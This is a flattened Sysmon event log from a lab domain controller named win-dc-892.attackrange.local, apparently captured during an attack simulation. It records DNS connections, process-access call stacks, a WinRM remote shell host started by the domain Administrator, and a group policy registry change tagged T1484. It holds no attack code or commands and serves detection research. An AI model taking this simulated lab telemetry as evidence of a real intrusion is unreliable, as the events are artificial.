354300x80000000000000003120Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:19.353{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54225- 354300x80000000000000003119Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:18.918{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruea00:10e:0:0:f8e0:fca5:d9d:ffff-54224-truee000:fc:0:0:0:0:0:0-5355llmnr 354300x80000000000000003118Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:18.918{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetruefe80:0:0:0:8c4d:e56a:c9ce:fd2bwin-dc-892.attackrange.local54224-trueff02:0:0:0:0:0:1:3-5355llmnr 354300x80000000000000003117Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:18.386{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local58642- 354300x80000000000000003121Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:20.355{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local54225- 354300x80000000000000003128Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:21.511{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local54224- 354300x80000000000000003127Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:21.511{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local61263- 354300x80000000000000003126Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:21.511{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-892.attackrange.local53domainfalse127.0.0.1win-dc-892.attackrange.local54226- 354300x80000000000000003125Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:20.949{266CAFBE-6467-6064-0100-00000000AE01}4SystemNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-892.attackrange.local137netbios-nsfalse10.0.1.12-137netbios-ns 354300x80000000000000003124Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:20.497{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local61263- 354300x80000000000000003123Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:20.497{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54224- 354300x80000000000000003122Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:20.497{266CAFBE-647D-6064-3200-00000000AE01}2716C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local54226- 10341000x80000000000000003184Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.986{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6494-6064-7D00-00000000AE01}5096C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003183Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.955{266CAFBE-6494-6064-7E00-00000000AE01}51084132C:\Windows\system32\conhost.exe{266CAFBE-6494-6064-7D00-00000000AE01}5096C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003182Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.939{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6494-6064-7E00-00000000AE01}5108C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003181Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.939{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003180Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.939{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003179Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.939{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003178Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.939{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003177Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.939{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003176Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.939{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003175Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.939{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003174Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.939{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003173Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.939{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003172Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.939{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6494-6064-7D00-00000000AE01}5096C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003171Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.939{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6494-6064-7D00-00000000AE01}5096C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000003170Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.939{266CAFBE-6494-6064-7D00-00000000AE01}5096C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{266CAFBE-648A-6064-D902-060000000000}0x602d90HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{266CAFBE-646C-6064-0C00-00000000AE01}592C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000003169Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.924{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000003168Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.908{266CAFBE-646C-6064-1000-00000000AE01}1124NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\security\templates\policies\tmpgptfl.infMD5=F443C7B00E42C58336E9113C4B92A1EA,SHA256=01406B7BD612A8321213382482E44EA2C7B5467B57E17E9C135EAB2A8221FAEA,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000003167Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.localT1484SetValue2021-03-31 12:01:24.893{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions\{827D319E-6EAC-11D2-A4EA-00C04F79F83A}\MaxNoGPOListChangesIntervalDWORD (0x000003c0) 10341000x80000000000000003166Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.877{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6494-6064-7C00-00000000AE01}5044C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003165Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.846{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003164Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.846{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000003163Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.846{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1500-00000000AE01}1316C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 644600x80000000000000003162Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:39.752C:\Windows\System32\drivers\xennet.sysMD5=7E6757CF81A305710B036475BCEDBC30,SHA256=9A5D7EAC527B6CDEC891C4A5C49FAF8599A1714078960DB87A7D72B0888A8987,IMPHASH=73F39C491797C6F3DFFBBE92FB638F34trueAmazon Web Services, Inc.Valid 10341000x80000000000000003161Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.768{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6494-6064-7C00-00000000AE01}5044C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000003160Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:24.768{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-6494-6064-7C00-00000000AE01}5044C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 644600x80000000000000003159Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 